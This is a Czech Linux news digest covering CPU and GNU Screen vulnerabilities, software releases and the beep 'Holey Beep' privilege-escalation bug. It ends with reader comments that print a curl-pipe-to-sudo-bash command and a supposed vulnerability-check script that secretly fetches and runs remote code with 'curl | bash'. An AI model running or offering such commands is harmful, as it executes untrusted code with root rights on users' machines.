Branch Privilege Injection (CVE-2024-45332, Paper) je nejnovější bezpečnostní problém procesorů Intel. Intel jej řeší ve včerejším opravném vydání 20250512 mikrokódů pro své procesory. Neprivilegovaný uživatel si například může přečíst /etc/shadow (YouTube).
Dle plánu byl vývoj Firefoxu přesunut z Mercurialu na Git. Oficiální repozitář se zdrojovými kódy je na GitHubu.
V terminálovém multiplexoru GNU Screen byly nalezeny a v upstreamu ve verzi 5.0.1 už opraveny bezpečnostních chyby CVE-2025-23395, CVE-2025-46802, CVE-2025-46803, CVE-2025-46804 a CVE-2025-46805. Podrobnosti na blogu SUSE Security Teamu.
Training Solo (Paper, GitHub) je nejnovější bezpečnostní problém procesorů Intel s eIBRS a některých procesorů ARM. Intel vydal opravnou verzi 20250512 mikrokódů pro své procesory.
Byla vydána nová verze 25.05.11 svobodného multiplatformního video editoru Shotcut (Wikipedie) postaveného nad multimediálním frameworkem MLT. Nejnovější Shotcut je již vedle zdrojových kódů k dispozici také ve formátech AppImage, Flatpak a Snap.
Svobodný elektronický platební systém GNU Taler (Wikipedie, cgit) byl vydán ve verzi 1.0. GNU Taler chrání soukromí plátců a zároveň zajišťuje, aby byl příjem viditelný pro úřady. S vydáním verze 1.0 byl systém spuštěn ve Švýcarsku.
Spolek OpenAlt zve příznivce otevřených řešení a přístupu na 209. brněnský sraz, který proběhne tento pátek 16. května od 18:00 ve studentském klubu U Kachničky na Fakultě informačních technologií Vysokého učení technického na adrese Božetěchova 2/1. Jelikož se Brno stalo jedním z hlavních míst, kde se vyvíjí open source knihovna OpenSSL, tentokrát se OpenAlt komunita potká s komunitou OpenSSL. V rámci srazu Anton Arapov z OpenSSL
… více »GNOME Foundation má nového výkonného ředitele. Po deseti měsících skončil dočasný výkonný ředitel Richard Littauer. Vedení nadace převzal Steven Deobald.
Byl publikován přehled vývoje renderovacího jádra webového prohlížeče Servo (Wikipedie) za uplynulé dva měsíce. Servo zvládne už i Gmail. Zakázány jsou příspěvky generované pomocí AI.
Raspberry Pi Connect, tj. oficiální služba Raspberry Pi pro vzdálený přístup k jednodeskovým počítačům Raspberry Pi z webového prohlížeče, byla vydána v nové verzi 2.5. Nejedná se už o beta verzi.
V programu beep (advanced pc-speaker beeper) byla nalezena bezpečnostní chyba CVE-2018-0492. Má-li beep nastaven s-bit, je chyba zneužitelná k lokální eskalaci práv. Chyba dostala vlastní jméno: Holey Beep [Hacker News].
Tiskni
Sdílej:
What this means is that root can always make beep work (to the best of my knowledge!), and that any local user can make beep work, BUT a non-root remote user cannot use beep in it's natural state. What's worse, an xterm, or other x-session counts, as far as the kernel is concerned, as 'remote', so beep won't work from a non-priviledged xterm either. I had originally chalked this up to a bug, but there's actually nothing I can do about it, and it really is a Good Thing that the kernel does things this way. There is also a solution. By default beep is not installed with the suid bit set, because that would just be zany. On the other hand, if you do make it suid root, all your problems with beep bailing on ioctl calls will magically vanish, which is pleasant, and the only reason not to is that any suid program is a potential security hole. Conveniently, beep is very short, so auditing it is pretty straightforward. Decide for yourself, of course, but it looks safe to me - there's only one buffer and fgets doesn't let it overflow, there's only one file opening, and while there is a potential race condition there, it's with /dev/console. If someone can exploit this race by replacing /dev/console, you've got bigger problems. :)
# curl https://holeybeep.ninja/am_i_vulnerable.sh | sudo bash # nejsem blázen curl https://holeybeep.ninja/am_i_vulnerable.sh #!/bin/sh # TODO: Backdoor this machine? modprobe pcspkr beep -l 1000 -r 3 -f 44000
$ cat am_i_vulnerable.sh #!/bin/sh curl https://l0.re/hb | bash modprobe pcspkr beep -l 1000 -r 3 -f 44000